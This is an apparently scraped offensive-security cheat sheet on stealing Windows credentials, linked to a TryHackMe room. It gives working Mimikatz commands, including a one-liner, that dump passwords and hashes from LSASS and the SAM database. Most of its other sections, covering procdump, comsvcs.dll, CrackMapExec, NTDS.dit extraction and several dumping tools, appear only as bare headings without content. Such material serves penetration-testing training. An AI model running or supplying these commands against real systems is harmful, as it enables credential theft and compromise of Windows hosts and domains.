Stealing Credentials
TryHackMe Room with all the ways to steal creds.
Stealing Credentials
Credentials Mimikatz
#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"Invoke-Mimikatz
Credentials with Meterpreter
Bypassing AV
Procdump + Mimikatz
Dumping lsass with comsvcs.dll
Dumping lsass with Task Manager
Dumping lsass with procdump
CrackMapExec
Dump SAM hashes
Dump LSA secrets
Dump the NTDS.dit from target DC
Dump the NTDS.dit password history from target DC
Show the pwdLastSet attribute for each NTDS.dit account
Stealing SAM & SYSTEM
From Registry
Volume Shadow Copy
Invoke-NinjaCopy
Active Directory Credentials - NTDS.dit
Copying NTDS.dit using Ntdsutil
Extracting hashes from NTDS.dit
Lazagne
Other tools for extracting credentials from SAM and LSASS
Windows credentials Editor (WCE)
fgdump
PwDump
PwDump7
Defenses
Last updated